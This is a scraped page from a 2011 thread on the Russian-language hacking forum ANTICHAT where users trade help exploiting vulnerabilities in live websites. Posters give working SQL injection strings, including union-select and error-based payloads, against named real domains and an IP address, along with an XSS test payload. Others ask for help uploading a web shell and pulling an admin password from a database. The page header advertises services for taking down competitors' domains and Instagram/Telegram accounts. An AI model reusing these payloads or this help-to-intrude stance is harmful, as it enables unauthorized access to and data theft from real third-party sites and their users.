УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1827 из 2438

1827

Опции темы

Поиск в этой теме

Опции просмотра

#18261

05.10.2011, 19:17

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Цитата:

Сообщение от z0mbie86

z0mbie86 said:
Помогите раскрутить http://217.8.80.55/?m[admin]&id=1'

Имхо, это не скуля.

Нужен админский доступ - заюзай XSS лучше

Код:

Code:
http://217.8.80.55/?m[search]&search_block_num=alert(/Its XSS, Baby/)

#18262

05.10.2011, 19:29

z0mbie86

Новичок

Регистрация: 25.07.2009

Сообщений: 10

Провел на форуме:
71531

Репутация: 0

Цитата:

Сообщение от BigBear

BigBear said:
Имхо, это не скуля.
Нужен админский доступ - заюзай XSS лучше
Там доступ в админку была но теперь сама админка удалена.

#18263

05.10.2011, 20:07

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Цитата:

Сообщение от alexvrn

alexvrn said:
Можно ли раскрутит такую скулю id=1' ?

Код:

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY image_order LIMIT 2' at line 1

Помогите пожалуйста

Мне тока что с таким сообщением стукнули в аську, ДА МОЖНО, но прежде чем это сделать, нужно хотя бы пару статеек по скулям почитать и понять что к чему, скуля там очень простая:

Цитата:

Сообщение от None

_http://www.mallorca-properties.co.uk/index.php/globals/_slideshow-images_en/?entry_id=1'

там фильтруются скобки, а вы навернека первым делом встевели что то типо version()

вообщем вот ваше начало:

Цитата:

Сообщение от None

http://www.mallorca-properties.co.uk/index.php/globals/_slideshow-images_en/?entry_id=-1+union+select+1,2+--+

а дальше хоть немножко напрегите свои извилены!

#18264

05.10.2011, 20:11

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Цитата:

Сообщение от z0mbie86

z0mbie86 said:
Помогите раскрутить http://217.8.80.55/?m[admin]&id=1'

Код:

Code:
https://wifi.hm-ugratel.ru/?m[admin]&id=',''and(select(1)from(select(count(*)),(concat((select(version())),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and'

version(): 5.0.67

#18265

06.10.2011, 03:16

Leon2k

Guest

Сообщений: n/a

Провел на форуме:
303

Репутация: 0

Привет если есть кто умеет лить шелл отпишитесь в личку пожалуйста или аську в личку.

#18266

06.10.2011, 03:16

OxoTnik

Guest

Сообщений: n/a

Провел на форуме:
290351

Репутация: 173

Доброго здравия форумчане!

В общем ищу где можно почитать про PostgreSQL

Нашёл такую скулю на сайте, а как попросить его показать мне пароль админа не знаю,

Помогите убедить сайт.

Leon2k

Можешь обратиться в личку, всё что знаю расскажу!

#18267

06.10.2011, 07:49

Unknown

Guest

Сообщений: n/a

Провел на форуме:
129743

Репутация: 92

Цитата:

Сообщение от OxoTnik

OxoTnik said:
Доброго здравия форумчане!
В общем ищу где можно почитать про
PostgreSQL

Проведение SQL-Injection в PostgreSQL

#18268

07.10.2011, 01:30

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Цитата:

Сообщение от OxoTnik

OxoTnik said:
такая проблема
Узнал таблицы, колонки, а в нужных колонках он не показывает нужную инфу
Как в этом случае его вытащить??
Ввёл точно все правильно!

Возможно, придётся поработать с выводом, чтото вроде

Код:

Code:
unhex(hex(%Visible_Col%)) или AES_DECRYPT(AES_ENCRYPT(%Visible_Col%,0x 71),0x71)

где %Visible_Col% - выводимая колонка в запросе

всё зависит от случая

#18269

07.10.2011, 02:36

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Цитата:

Сообщение от OxoTnik

OxoTnik said:
Только где про это почитать?

В любой статье по SQL-иньекциям.

/thread43966.html

/thread104591.html

#18270

07.10.2011, 11:53

Mr.aids

Guest

Сообщений: n/a

Провел на форуме:
2371

Репутация: 0

insert into помогите с injection

запрос вида

log.php?ver=1.0.1.130'

Ошибка при занесении информации в базу.

118 ******/log.php

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1.0.1.130'', '' )' at line 25

INSERT INTO log (event, os, client, ie, fr, op, ch, guid, ip, ver, msg ) VALUES ( '', '', '', '', '', '', '', '', '127.0.0.1', '1.0.1.130'', '' ) array(1) { ["ver"]=> string(10) "1.0.1.130'" }

все параметры строковые, можно как то вставить union+select?

Страница 1827 из 2438

1827

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход